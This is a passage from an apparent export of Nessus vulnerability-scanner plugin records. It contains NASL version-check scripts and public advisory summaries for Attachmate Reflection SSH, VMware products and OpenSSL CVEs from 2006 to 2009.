(CVE-2008-1483)\n\n - There are multiple unspecified other vulnerabilities.\n (CVE-2008-6021)\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79d29f9f\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Attachmate Reflection for Secure IT UNIX server 7.0 SP1.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection_for_secure_it\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264, 399);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/08/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/09/28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n \n script_copyright(english:\"This script is Copyright (C) 2008-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\n# Don't flag Windows hosts\nos = get_kb_item_or_exit(\"Host/OS\");\nif (os && \"Windows\" >< os) audit(AUDIT_OS_NOT, \"a Unix and Unix-like OS\", \"Microsoft Windows\");\n\nport = get_kb_item(\"Services/ssh\");\nif (!port) port = 22;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Check the version in the banner.\nbanner = get_kb_item(\"SSH/banner/\" + port);\nif (!banner) audit(AUDIT_WEB_BANNER_NOT, port);\nif (\"ReflectionForSecureIT_\" >!< banner) audit(AUDIT_NOT_LISTEN, \"Attachmate Reflection for Secure IT UNIX server\", port);\n\nver = strstr(banner, \"ReflectionForSecureIT_\") - \"ReflectionForSecureIT_\";\nif (!ver) audit(AUDIT_SERVICE_VER_FAIL, \"Attachmate Reflection for Secure IT UNIX server SSH\", port);\n\narr = split(ver, sep:\".\", keep:FALSE);\n\nfor ( i = 0 ; i < max_index(arr) ; i ++ )\n{\n arr[i] = int(arr[i]);\n}\n\nvuln = FALSE;\n\nif (arr[0] && arr[0] < 7) vuln = TRUE;\nif (arr[0] && arr[0] == 7 && arr[1] && arr[1] == 0)\n{\n if (arr[2] && arr[2] < 1) vuln = TRUE;\n if (arr[2] && arr[2] == 1 && arr[3] && arr[3] < 575) vuln = TRUE;\n}\n\nif (vuln)\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"The remote Attachmate Reflection for Secure IT UNIX server returned\\n\",\n \"the following banner :\\n\",\n \"\\n\",\n \" \", banner, \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Attachmate Reflection for Secure IT UNIX server\", port, ver);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:10:46", "description": "VMware products installed on the remote host are affected by multiple vulnerabilities :\n\n - The 'authd' process is affected by a privilege escalation vulnerability that could allow an attacker to execute arbitrary code with system level privileges or cause a denial of service condition.\n\n - A feature in VMware workstation version 6.0.2 could allow anonymous console access to guest host via VIX API, which could result in unauthorized access. This feature has been disabled in version 6.0.3.\n\n - Windows based VMware hosts are affected by a privilege escalation vulnerability. By manipulating 'config.ini' an attacker may be able to gain elevated privileges by hijacking the VMware VMX process.\n\n - Multiple VMware products are affected by a directory traversal vulnerability. If a Windows based VMware host is configured to allow shared access from a guest host to a folder on the Host system (HGFS), it may be possible to gain access to the Host file system from guest OS and create/modify arbitrary executable files. VMware Server is not affected by this vulnerability.\n\n - Multiple VMware products hosted on a Windows 2000 host are affected by a privilege escalation vulnerability.\n\n - Multiple VMware products are vulnerable to a potential denial of service attack.", "cvss3": {"score": null, "vector": null}, "published": "2008-04-02T00:00:00", "type": "nessus", "title": "VMware Products Multiple Vulnerabilities (VMSA-2008-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-5269", "CVE-2007-5618", "CVE-2008-0923", "CVE-2008-1340", "CVE-2008-1361", "CVE-2008-1362", "CVE-2008-1363", "CVE-2008-1364", "CVE-2008-1392"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:vmware:ace", "cpe:/a:vmware:player", "cpe:/a:vmware:vmware_server", "cpe:/a:vmware:vmware_workstation"], "id": "VMWARE_MULTIPLE_VMSA_2008_0005.NASL", "href": "https://www.tenable.com/plugins/nessus/31729", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31729);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2006-2937\",\n \"CVE-2006-2940\",\n \"CVE-2006-4339\",\n \"CVE-2006-4343\",\n \"CVE-2007-5269\",\n \"CVE-2007-5618\",\n \"CVE-2008-0923\",\n \"CVE-2008-1340\",\n \"CVE-2008-1361\",\n \"CVE-2008-1362\",\n \"CVE-2008-1363\",\n \"CVE-2008-1364\",\n \"CVE-2008-1392\"\n );\n script_bugtraq_id(28276,28289);\n script_xref(name:\"VMSA\", value:\"2008-0005\");\n\n script_name(english:\"VMware Products Multiple Vulnerabilities (VMSA-2008-0005)\");\n script_summary(english:\"Checks vulnerable versions of multiple VMware products\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"VMware products installed on the remote host are affected by multiple\nvulnerabilities :\n\n - The 'authd' process is affected by a privilege\n escalation vulnerability that could allow an attacker to\n execute arbitrary code with system level privileges or\n cause a denial of service condition.\n\n - A feature in VMware workstation version 6.0.2 could\n allow anonymous console access to guest host via VIX\n API, which could result in unauthorized access. This\n feature has been disabled in version 6.0.3.\n\n - Windows based VMware hosts are affected by a privilege\n escalation vulnerability. By manipulating 'config.ini'\n an attacker may be able to gain elevated privileges by\n hijacking the VMware VMX process.\n\n - Multiple VMware products are affected by a directory\n traversal vulnerability. If a Windows based VMware host\n is configured to allow shared access from a guest host\n to a folder on the Host system (HGFS), it may be\n possible\n to gain access to the Host file system from guest OS and\n create/modify arbitrary executable files. VMware Server\n is not affected by this vulnerability.\n\n - Multiple VMware products hosted on a Windows 2000 host\n are affected by a privilege escalation vulnerability.\n\n - Multiple VMware products are vulnerable to a potential\n denial of service attack.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2008-0005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/server/doc/releasenotes_server.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/ws6/doc/releasenotes_ws6.html#603\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/player/doc/releasenotes_player.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/player2/doc/releasenotes_player2.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/ace2/doc/releasenotes_ace2.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to :\n\n - VMware Workstation 6.0.3/5.5.6 or higher.\n - VMware Server 1.0.5 or higher.\n - VMware Player 2.0.3/1.0.6 or higher.\n - VMware ACE 2.0.3/1.0.5 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 20, 22, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:ace\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:player\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:vmware_server\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:vmware_workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\",\"vmware_server_win_detect.nasl\", \"vmware_player_detect.nasl\",\"vmware_ace_detect.nasl\");\n script_require_ports(\"VMware/Server/Version\", \"VMware/ACE/Version\", \"VMware/Player/Version\", \"VMware/Workstation/Version\", 139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nport = kb_smb_transport();\n\n# Check for VMware Workstation\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n\n if (( int(v[0]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) == 5 && int(v[2]) < 6 ) ||\n ( int(v[0]) == 6 && int(v[1]) == 0 && int(v[2]) < 3 )\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Version \",version,\" of VMware Workstation is installed on the remote host.\",\n \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else\n \t security_hole(port);\n }\n}\n\n# Check for VMware Server\n\nversion = get_kb_item(\"VMware/Server/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n if ( ( int(v[0]) < 1 ) ||\n ( int(v[0]) == 1 && int(v[1]) == 0 && int(v[2]) < 5 )\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Version \",version,\" of VMware Server is installed on the remote host.\",\n \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else\n \tsecurity_hole(port);\n }\n}\n\n# Check for VMware Player\n\nversion = get_kb_item(\"VMware/Player/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n if ( ( int(v[0]) < 1 ) ||\n ( int(v[0]) == 1 && int(v[1]) == 0 && int(v[2]) < 6 ) ||\n ( int(v[0]) == 2 && int(v[1]) == 0 && int(v[2]) < 3 )\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Version \",version,\" of VMware Player is installed on the remote host.\",\n \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else\n security_hole(port);\n }\n}\n\n# Check for VMware ACE.\nversion = get_kb_item(\"VMware/ACE/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n if ( ( int(v[0]) < 1 ) ||\n ( int(v[0]) == 1 && int(v[1]) == 0 && int(v[2]) < 5 ) ||\n ( int(v[0]) == 2 && int(v[1]) == 0 && int(v[2]) < 3 )\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Version \",version,\" of VMware ACE is installed on the remote host.\",\n \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else\n security_hole(port);\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:13:16", "description": "The remote host is affected by the vulnerability described in GLSA-200710-06 (OpenSSL: Multiple vulnerabilities)\n\n Moritz Jodeit reported an off-by-one error in the SSL_get_shared_ciphers() function, resulting from an incomplete fix of CVE-2006-3738. A flaw has also been reported in the BN_from_montgomery() function in crypto/bn/bn_mont.c when performing Montgomery multiplication.\n Impact :\n\n A remote attacker sending a specially crafted packet to an application relying on OpenSSL could possibly execute arbitrary code with the privileges of the user running the application. A local attacker could perform a side channel attack to retrieve the RSA private keys.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-09T00:00:00", "type": "nessus", "title": "GLSA-200710-06 : OpenSSL: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2007-3108", "CVE-2007-5135"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:openssl", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200710-06.NASL", "href": "https://www.tenable.com/plugins/nessus/26946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200710-06.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26946);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3738\", \"CVE-2007-3108\", \"CVE-2007-5135\");\n script_xref(name:\"GLSA\", value:\"200710-06\");\n\n script_name(english:\"GLSA-200710-06 : OpenSSL: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200710-06\n(OpenSSL: Multiple vulnerabilities)\n\n Moritz Jodeit reported an off-by-one error in the\n SSL_get_shared_ciphers() function, resulting from an incomplete fix of\n CVE-2006-3738. A flaw has also been reported in the\n BN_from_montgomery() function in crypto/bn/bn_mont.c when performing\n Montgomery multiplication.\n \nImpact :\n\n A remote attacker sending a specially crafted packet to an application\n relying on OpenSSL could possibly execute arbitrary code with the\n privileges of the user running the application. A local attacker could\n perform a side channel attack to retrieve the RSA private keys.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200710-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSL users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8e-r3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/openssl\", unaffected:make_list(\"ge 0.9.8e-r3\"), vulnerable:make_list(\"lt 0.9.8e-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSL\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:13:33", "description": "A flaw in how OpenSSL performed Montgomery multiplications was discovered %that could allow a local attacker to reconstruct RSA private keys by examining another user's OpenSSL processes (CVE-2007-3108).\n\nMoritz Jodeit found that OpenSSL's SSL_get_shared_ciphers() function did not correctly check the size of the buffer it was writing to. As a result, a remote attacker could exploit this to write one NULL byte past the end of the applications's cipher list buffer, which could possibly lead to a denial of service or the execution of arbitrary code (CVE-2007-5135).\n\nUpdated packages have been patched to prevent these issues.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-09T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : openssl (MDKSA-2007:193)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2007-3108", "CVE-2007-5135"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64openssl0.9.8", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:openssl", "cpe:/o:mandriva:linux:2007", "cpe:/o:mandriva:linux:2007.1"], "id": "MANDRAKE_MDKSA-2007-193.NASL", "href": "https://www.tenable.com/plugins/nessus/26950", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:193. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26950);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3738\", \"CVE-2007-3108\", \"CVE-2007-5135\");\n script_xref(name:\"MDKSA\", value:\"2007:193\");\n\n script_name(english:\"Mandrake Linux Security Advisory : openssl (MDKSA-2007:193)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw in how OpenSSL performed Montgomery multiplications was\ndiscovered %that could allow a local attacker to reconstruct RSA\nprivate keys by examining another user's OpenSSL processes\n(CVE-2007-3108).\n\nMoritz Jodeit found that OpenSSL's SSL_get_shared_ciphers() function\ndid not correctly check the size of the buffer it was writing to. As a\nresult, a remote attacker could exploit this to write one NULL byte\npast the end of the applications's cipher list buffer, which could\npossibly lead to a denial of service or the execution of arbitrary\ncode (CVE-2007-5135).\n\nUpdated packages have been patched to prevent these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-devel-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-static-devel-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-devel-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-static-devel-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"openssl-0.9.8b-2.3mdv2007.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-devel-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-static-devel-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libopenssl0.9.8-devel-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libopenssl0.9.8-static-devel-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"openssl-0.9.8e-2.2mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T22:00:52", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl098e packages installed that are affected by multiple vulnerabilities:\n\n - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote attackers to cause a denial of service (infinite loop and memory consumption) via malformed ASN.1 structures that trigger an improperly handled error condition. (CVE-2006-2937)\n\n - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows attackers to cause a denial of service (CPU consumption) via parasitic public keys with large (1) public exponent or (2) public modulus values in X.509 certificates that require extra time to process when using RSA signature verification.\n (CVE-2006-2940)\n\n - Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers.\n (CVE-2006-3738)\n\n - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1. (CVE-2006-4339)\n\n - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference. (CVE-2006-4343)\n\n - The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys. (CVE-2007-3108)\n\n - Off-by-one error in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8f allows remote attackers to execute arbitrary code via unspecified vectors. (CVE-2007-4995)\n\n - Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. As of 20071012, it is unknown whether code execution is possible.\n (CVE-2007-5135)\n\n - OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys. (CVE-2008-5077)\n\n - The ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.\n (CVE-2009-0590)\n\n - The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377)\n\n - Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378)\n\n - Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate. (CVE-2009-1379)\n\n - ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello.\n (CVE-2009-1386)\n\n - The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of- sequence DTLS handshake message, related to a fragment bug. (CVE-2009-1387)\n\n - The Network Security Services (NSS) library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large. (CVE-2009-2409)\n\n - OpenSSL before 0.9.8m does not check for a NULL return value from bn_wexpand function calls in (1) crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3) 